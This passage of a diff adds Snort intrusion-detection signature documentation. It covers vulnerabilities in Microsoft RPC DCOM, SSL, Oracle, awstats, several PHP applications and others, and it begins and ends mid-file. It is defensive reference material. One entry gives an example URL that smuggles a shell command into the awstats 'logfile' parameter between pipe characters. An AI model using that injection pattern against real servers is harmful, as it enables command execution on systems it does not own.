+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
--- /dev/null
+++ b/doc/signatures/2296.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2296
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3404.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3404
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3464.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3464
+
+--
+Summary:
+This event is generated when an attempt is made to execute system
+commands via the cgi script awstats.pl.
+
+--
+Impact:
+Possible execution of system commands.
+
+--
+Detailed Information:
+Adavanced Web Statistics (awstats) is used to process web server log
+files and produces reports of web server usage.
+
+Some versions of awstats do not correctly sanitize user input. This may
+present an attacker with the opportunity to supply system commands via
+the "logfile" parameter. For the attack to be sucessful the "update"
+parameter must also have the value set to "1". This event indicates that
+an attempt has been made to pass a system command as a value to the
+"logfile" parameter the awstats.pl cgi script.
+
+--
+Affected Systems:
+	Awstats 6.1 and prior
+
+--
+Attack Scenarios:
+An attacker can supply commands of their choosing as a value for the
+logfile parameter by enclosing the commands in pipe charecters. For
+example: 
+
+ http://www.foo.com/cgi-bin/awstats.pl?update=1&logfile=|<command here>|
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+Disallow access to awstats.pl as a CGI script.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/717.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+717
+
+--
+Summary:
+This event is generated when a failed remote telnet connection occurs using the root account.
+
+--
+Impact:
+Failed root access.  This event indicates that an attacker tried an failed to connect to a telnet server using the root account.
+
+
+--
+Detailed Information:
+Telnet servers can be configured to disallow connections using the root account.  If root privileges are required, the root user must log on to the telnet server's console directly.  A failed telnet connection using the root account will generate an error message. 
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to log on to a telnet server using the root account.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Disable root logins using telnet.
+
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule written by Ron Gula<rgula@tenablesecurity.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS365
+
+--
--- /dev/null
+++ b/doc/signatures/559.txt
@@ -0,0 +1,91 @@
+Rule:  
+
+--
+
+Sid:
+
+559
+
+--
+
+Summary:
+
+A network-external client has connected to an internal GNUTella server
+and issued a connect attempt to begin communications.
+
+--
+
+Impact:
+
+Possible policy violation; possible excess network load.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella server has been detected
+on the protected network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella client installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+
+N/A
+
+--
+
+Ease of Attack:
+
+N/A
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA CONNECT" on all ports.  As a
+result, any email, web page, or other network content that discusses the
+protocol and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+
+--
--- /dev/null
+++ b/doc/signatures/3094.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3094
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3211.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3211
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1795.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1795
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "ejaculat".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "ejaculat".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2234.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2234
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
--- /dev/null
+++ b/doc/signatures/415.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+415
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Reply datagram.
+
+--
+
+Impact:
+ICMP Information Reply datagrams contain the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+--
+
+Detailed Information:
+This message is generated in response to an ICMP Information Request Message.  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 16 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3359.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3359
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3446.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3446
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2058.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2058
+
+--
+Summary:
+vulnerability in MondoSearch.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Versions of MondoSearch prior to 4.4.5156 use a vulnerable version of a 
+cgi script named msmmask.exe. This script allows the attacker to view 
+the source of any file in a webservers root directory.
+
+--
+Affected Systems:
+MondoSearch versions prior to 4.4.5156.
+
+--
+Attack Scenarios:
+The attacker needs to access the msmmask.exe script and request a file 
+in the servers web directory.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the application to at least version 4.4.5156 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11163
+
+--
--- /dev/null
+++ b/doc/signatures/100000613.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000613
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2940.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2940
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000354.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000354
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpBB-Amod" application running on a webserver. Access to the file "lang_activity.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "lang_activity.php" script used by the "phpBB-Amod" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBB-Amod
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000784.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000784
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "current_cat" parameter in the "create_course.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/3152.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid:
+3152
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access a host running
+Microsoft SQL Server or utilizing MSDE via the default "sa" account.
+
+-- 
+Impact: 
+Information disclosure. Unauthorized access to the host.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access a host via the
+"sa" account using brute force techniques to guess a password.
+
+Microsoft SQL server and MSDE components use a default "sa" account with
+a default password as the administrative user for the database
+installation. This event indicates that numerous failed attempts have
+been made to access the target host using this account.
+
+--
+Affected Systems:
+	Microsoft SQL Server 2000
+	Microsoft SQL Server 7.0
+	Systems using Microsoft MSDE components
+
+--
+Attack Scenarios:  
+An attacker can use an automated script to gain access to a host and the
+database contents as an administrator by repeatly attempting to login
+using the "sa" account and different passwords.
+
+Some worms also try to brute force entry using this methodology.
+
+-- 
+Ease of Attack: 
+Simple,
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches
+
+Change the default "sa" password
+
+Disable the "sa" account.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2716.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2716
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_load
+. This procedure is included in
+dbms_offline_snapshot.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2727.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2727
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nvarchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2741.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2741
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3163.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3163
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2245.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2245
+
+--
+Summary:
